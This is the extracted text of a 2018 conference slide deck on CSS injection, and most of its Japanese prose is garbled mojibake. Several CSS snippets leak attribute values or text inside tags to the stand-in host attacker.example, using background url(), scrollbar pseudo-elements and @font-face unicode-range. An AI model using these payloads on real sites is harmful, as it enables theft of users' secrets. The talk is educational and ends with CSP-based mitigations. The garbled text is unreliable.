Slide 1
Slide 1 text
Takashi Yoneuchi
ja: @lmt_swallow , en: @y0n3uchy
https://shift-js.info
"File:CSS3 logo and wordmark.svg." Wikimedia Commons, the free media repository. 28 Feb 2018, 03:50 UTC. 25 Aug 2018, 05:09 .
CSS Injection ++
طଘख๏ͷ֓؍ͱରࡦ
Slide 2
Slide 2 text
© 2018 shift-js.info All Rights Reserved.
@lmt_swallow
‣ 5BLBTIJ:POFVDIJ
BLB!ZOVDIZ
‣ EPEPEPEP $5'5FBN
J
54(
‣ 4&$$0/#FHJOOFST
DUGC
TFDDBNQTUB⒎
‣ 8FC4FDVSJUZ3FTFBSDIFS
8BOOBCF
‣ IUUQTTIJGUKTJOGP
Slide 3
Slide 3 text
CSS Injection ͱ
Slide 4
Slide 4 text
© 2018 shift-js.info
CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
CSS Injection
੬ऑੑͷ֓ཁ
‣ "CSS injection vulnerabilities arise when an
application imports a style sheet from a user-
supplied URL, or embeds user input in CSS blocks
without adequate escaping. "
(PortSwigger, https://portswigger.net/kb/issues/00501300_css-injection-reflected)
‣ ߈ܸऀ͕ҙ CSS ϑΝΠϧͷΠϯϙʔτΛͤͨ͞Γ,
ΛΤεέʔϓແ͠ͰૠೖͰ͖Δ੬ऑੑ
4
Slide 5
Slide 5 text
© 2018 shift-js.info
CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
Threats
CSS Injection ͷڴҖ
‣ ʮͨͩ CSS ͕ૠೖͰ͖Δ͚ͩ͡Όͳ͍ͷ? ʯ
‣ ͑NO: े߈ܸͱཱͯ͢͠Δɻ
‣ CSS Injection ͷڴҖ࣍ͷΑ͏ʹྨͰ͖Δ:
‣ CSS ʹΑΔϖʔδίϯςϯπͷநग़
‣ ଐੑ (attribute) நग़
‣ λάίϯςϯπநग़
‣ (CSS ͔Βͷ JavaScript ࣮ߦ (outdate))
5
Slide 6
Slide 6 text
© 2018 shift-js.info
CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
Even if it seems "invisible" ...?
ݟ͑ͳ͍Α͏ʹݟ͑ͯ, ࣮…
‣ ࣮ λά͢Β style ΛௐՄೳ
‣ CSS Injection ͷରʹͳΔ
6
<head>
<style>
script { display: block; }
</style>
</head>
<body>
<script> var secret = "hello";
Slide 7
Slide 7 text
طଘख๏ͷ֓؍
Slide 8
Slide 8 text
© 2018 shift-js.info
CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
JS Execution from CSS
CSS ͔Βͷ JS ࣮ߦ
‣ ੲ͍͔ͭ͘ͷํ๏Ͱ JS (or దͳεΫϦ
ϓτݴޠ) ࣮ߦʹͭͳ͛Δٕ๏͕ଘࡏͨ͠ɻ
‣ .htc ϑΝΠϧͱ behavior: Λ͏ྫ
‣ expression: Λ͏ྫ
‣ ϞμϯͳϒϥβͰ (ΔݶΓ) ࣮ݱෆՄ
ೳͰ͋Δɻ
8
Slide 9
Slide 9 text
© 2018 shift-js.info
CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
Steal Values of Attributes
ଐੑΛϦʔΫ͢Δ: ݪཧ
‣ ࣍ͷΑ͏ͳ HTML λάΛߟ͑Α͏:
‣ ͜Ε࣍ͷ 3 ͭͷ CSS ηϨΫλશͯʹ
Ϛον͢Δ:
input[value ^= "a"] { /* ... */ }
input[value ^= "ab"] { /* ... */ }
input[value ^= "abc"] { /* ... */ }
‣ ͜ΕΛԠ༻͢Δͱ, ଐੑΛ leak Մೳɻ
9
Slide 10
Slide 10 text
© 2018 shift-js.info
CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
Steal Values of Attributes
ଐੑΛϦʔΫ͢Δ: શମਤ
10
input[value ^= "a"] {
background: url(http://attacker.example/?a)
} /* ... */
‘
߈ܸϕΫλ
ϦΫΤετ
ϦʔΫ
ࣹܕ
ੵܕ
Slide 11
Slide 11 text
© 2018 shift-js.info
CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
Steal Values of Attributes
ଐੑΛϦʔΫ͢Δ: ۩ମతख๏ (1)
‣ ࣍ͷλάͷ value Λൈ͖͍ͨͱ͢Δ:
‣ ࣍ͷΑ͏ͳ CSS Λ a-z ͷશͯ࡞ͬͯ Inject ͢Δ:
aaa
‣ attacker.example Ͱͪड͚͍ͯΕ GET /?a ͔Β
GET /?z ͷͲΕ͕ඈΜͰ͘Δɻ( ۩ମతʹ GET /?a )
‣ 1 จࣈ ("a") ͷ leak ୡ
11
input[value ^= "a"] {
background: url(http://attacker.example/?a)
}
Slide 12
Slide 12 text
© 2018 shift-js.info
CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
Steal Values of Attributes
ଐੑΛϦʔΫ͢Δ: ۩ମతख๏ (2)
‣ ࣍ʹ, ্هͷΑ͏ͳ CSS Λ४උ͢Δ:
‣ ಉ༷ʹ Inject ͯ͠ attacker.example Ͱͪड͚͍ͯ
Ε, 2 จࣈ ("b") leak Ͱ͖ΔɻҎ߱܁Γฦ͠ɻ
12
input[value ^= "aa"] {
background: url(http://attacker.example/?aa)
}
/* ... */
input[value ^= "az"] {
background: url(http://attacker.example/?az)
}
Slide 13
Slide 13 text
© 2018 shift-js.info
CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
Steal Inner Values of Tags
λά෦ͷΛϦʔΫ͢Δ: ֓؍
‣ ઌड़ͷํ๏Ͱ CSS ηϨΫλͷ͑Δ
"ଐੑ" ͔͠ leak Ͱ͖ͳ͍ (҆શ!) ɻ
‣ ͔͠͠λά෦ͷͷ leak , ผͷํ๏
Ͱ࣮ݱՄೳɻ͜Ε͕࣍ΩϞ:
‣ "Ligature" ͷ੍ޚ
‣ ͦͷεΫϩʔϧόʔ੍ޚʹΑΔݕ
‣ @SecurityMB ͞Μͷهࣄ͕͔Γ͍͢
https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-
wykorzystac-css-y-do-atakow-na-webaplikacje/
13
Slide 14
Slide 14 text
© 2018 shift-js.info
CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
Steal Inner Values of Tags
λά෦ͷΛϦʔΫ͢Δ: શମਤ
14
‘
߈ܸϕΫλ
ϦΫΤετ
ϦʔΫ
ࣹܕ
ੵܕ
Slide 15
Slide 15 text
© 2018 shift-js.info
CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
Steal Inner Values of Tags
λά෦ͷΛϦʔΫ͢Δ: શମਤ
15
ϑΥϯτ੍ޚ εΫϩʔϧόʔ੍ޚ
߈ܸϕΫλ = +
‣ ϑΥϯτ੍ޚ
‣ ಛఆ݅ԼͰͷΈεΫϩʔϧόʔ͕ੜ͡ΔΑ͏ʹௐ͢Δ
‣ εΫϩʔϧόʔ੍ޚ
‣ εΫϩʔϧόʔ͕ੜͨ͡ͱ͖ͷΈ, ͪड͚αʔόʔʹϦΫ
ΤετΛඈͤ͞Δ
Slide 16
Slide 16 text
© 2018 shift-js.info
CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
Steal Inner Values of Tags
λά෦ͷΛϦʔΫ͢Δ: ۩ମతख๏ (1)
16
ϑΥϯτ੍ޚ
f + i → fi (Times)
‣ ্هͷΑ͏ͳ Ligature (߹ࣈ) ϑΥϯτͰఆٛՄೳͰ͋Δɻ
‣ ͦ͜Ͱ, ࣍ͷΑ͏ͳϑΥϯτΛ༻ҙ͠, σʔλΛϦʔΫ͍ͨ͠
λάʹରͯ͠ઃఆ͢Δ:
‣ ಛఆͷจࣈͷฒͼ (e.g. abc) ʹରͯ͠, ϑΥϯτͷԣ෯Λ
ेେ͖͘औΔ
‣ ͦΕҎ֎ϑΥϯτͷԣ෯Λ 0 ʹ͢Δ
Slide 17
Slide 17 text
© 2018 shift-js.info
CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
Steal Inner Values of Tags
λά෦ͷΛϦʔΫ͢Δ: ۩ମతख๏ (2)
17
εΫϩʔϧόʔ੍ޚ
‣ ॳΊʹจࣈͷճΓࠐΈΛ௵͓ͯ͘͠: white-space: nowrap;
‣ ϑΥϯτ੍ޚʹΑΓ, ಛఆจࣈྻؚ͕·Ε͍ͯΔ߹ʹͷΈ,
εΫϩʔϧόʔ͕ੜ͡Δɻ
‣ ͋ͱ࣍ͷΑ͏ͳ CSS ซͤͯ Inject ͓ͯ͘͠ͱ, εΫϩʔϧ
όʔදࣔΛ͖͔͚ͬʹ, ͪड͚αʔόʔͱ௨৴͕Ͱ͖Δɻ
body::-webkit-scrollbar:horizontal {
background: url(http://attacker.example/leak);
}
Slide 18
Slide 18 text
© 2018 shift-js.info
CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
Steal Inner Values of Tags
λά෦ͷΛϦʔΫ͢Δ: ۩ମతख๏ (3)
18
‣ ྫ͑ Hello, abc ͷ abc Λ leak ͍ͨ࣌͠
‣ "Hello, a" ͷΈ ligature ͱͯ͠ԣ෯େ͖͘, ͦΕҎ֎ͷ
ҙจࣈԣ෯ 0 Ͱ͋ΔΑ͏ͳϑΥϯτΛ༻ҙ͢Δ
‣ ༻ҙͨ͠ϑΥϯτͷઃఆͱ, εΫϩʔϧόʔ੍ޚΛߦ͏ CSS
Λ, ֤ϑΥϯτ͝ͱʹ Inject ͢Δɻ(→ ͲΕ͔ͰൃՐ͢Δ)
‣ 1 จࣈ (= a ) ͕ leak Ͱ͖ͨΒ, ্هΛ܁Γฦ͢
‣ "Hello, ab", ... "Hello, az" ͳͲΛ४උ͢Δ, ͱ͍͏͜ͱ
ϑΥϯτ੍ޚ εΫϩʔϧόʔ੍ޚ
+
Slide 19
Slide 19 text
© 2018 shift-js.info
CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
Leak Candidates of Inner Values
λά෦ͷจࣈछΛߜΔ/ͦͷॱংΛΔ
‣ @font-face ͷࢦఆͰ, λά෦ͷจࣈछߜΕΔɻ
‣ unicode-range Λͬͯ, ֤ Unicode ίʔυϙΠ
ϯτʹରͯ͠ผݸͷϑΥϯτιʔεΛࢦఆ͢Δɻ
‣ ߈ܸऀඈΜͰ͖ͨϦΫΤετΛͪड͚Δɻ
‣ Reference: "@font-faceͷunicode-rangeΛར༻ͯ͠CSS͚ͩͰςΩετΛಡΈग़͢"
by @masatokinugawa, http://masatokinugawa.l0.cm/2015/10/css-based-attack-
abusing-unicode-range.html
19
@font-face{ font-family:poc; unicode-range:U+0041;
src: url(http://attacker.example/?A);}
Slide 20
Slide 20 text
© 2018 shift-js.info
CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
Leak Candidates of Inner Values
λά෦ͷจࣈछΛߜΔ/ͦͷॱংΛΔ
‣ ઌड़ͷख๏Ͱ͋ΔจࣈͷొΔ͜ͱ͕ग़དྷΔ͕, ͦͷ༻
ճɾॱ൪͔Βͳ͍ → ෆશͳ෮ݩɻ
‣ ॱ൪: CSS ͷ animation ΛΈ߹ΘͤΔ͜ͱͰ, จࣈͷॳొ
ॱΛอͪͭͭ, ϑΥϯτཁٻͷϦΫΤετΛඈͤ͞Δ͜
ͱ͕Ͱ͖Δɻ
‣ "HarekazeCTF2018 Web250 : A custom css for the flag"
by @KageShiron, http://blog.esora.xyz/HarekazeCTF2018-CSS#web250-jp
‣ ճ: ͜ΕΛઌड़ͷख๏Λϕʔεʹ෮ݩ͢Δख๏ະ (or
ଘࡏ͠ͳ͍?) (͍ͬͯͨΒڭ͍͑ͯͩ͘͞!)
20
Slide 21
Slide 21 text
ޚͷࢹ͔Β:
߈ܸܦ࿏ɾରࡦ
Slide 22
Slide 22 text
© 2018 shift-js.info
CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
Where can be exploited?
߈ܸܦ࿏
‣ Relative Path Overwrite (RPO)
‣ Writeup: "RPO Gadgets"
by @filedescriptor, https://blog.innerht.ml/rpo-gadgets/
‣ λάࣗମΛૠೖͰ͖Δ߹
‣ ͜ͷ߹ͦͦ <script> ΛૠೖͰ͖ͦ͏͕ͩ,
blacklist ͷόΠύεʹ͑Δ?
‣ <style> λάʹҙจࣈྻΛૠೖͰ͖Δ߹
‣ ҙ CSS ΛϢʔβʔ͕ઃఆͰ͖ΔՕॴ
22
Slide 23
Slide 23 text
© 2018 shift-js.info
CSS Injection ++: CSS Injection ؔ࿈ٕ๏ͷ֓؍ͱରࡦ
Mitigations
ରࡦ
‣ ΫϥΠΞϯτଆରࡦ: Content-Security-Policy
‣ ࠓճհͨ͠߈ܸख๏, શͯ CSP ͷ style-src
σΟϨΫςΟϒʹΑΓ੍ݶՄೳͰ͋Δɻ
‣ αʔόʔଆରࡦ: ϢʔβʔʹΑΔ CSS ૠೖͷ੍ݶ
‣ CSS Injection ؚΊ, ҙ CSS ΛૠೖͰ͖ΔՕॴ,
ेηΩϡϦςΟ্ͷϦεΫΓಘΔɻ
‣ Relative Path Overwrite ͕Մೳͳ߹, CSS ೖ͕
Ͱ͖ͦ͏ʹͳ͍ͱ͜Ζʹةݥੑ͋Γ! ҙɻ
23
Slide 24
Slide 24 text
Thank you for listening :-)
Any Questions?
Takashi Yoneuchi
ja: @lmt_swallow, en: @y0n3uchy
https://shift-js.info